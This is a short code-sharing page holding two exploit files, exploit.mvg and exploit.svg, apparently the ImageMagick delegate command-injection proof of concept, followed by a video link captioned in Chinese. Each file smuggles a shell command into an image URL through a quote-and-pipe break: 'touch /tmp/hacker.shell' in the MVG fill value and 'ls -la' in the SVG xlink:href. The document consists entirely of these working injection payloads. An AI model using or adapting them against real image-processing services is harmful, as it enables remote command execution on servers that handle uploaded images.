exploit.mvg
1 2 3 4 |
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)' pop graphic-context |
exploit.svg
1 2 3 4 5 6 7 8 9 |
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";> <svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg"; xmlns:xlink= "http://www.w3.org/1999/xlink";> <image xlink:href="https://example.com/image.jpg"|ls "-la" x="0" y="0" height="640px" width="480px"/> </svg> |
在线视频地址 https://www.youtube.com/watch?v=yA8LzYQ3DMc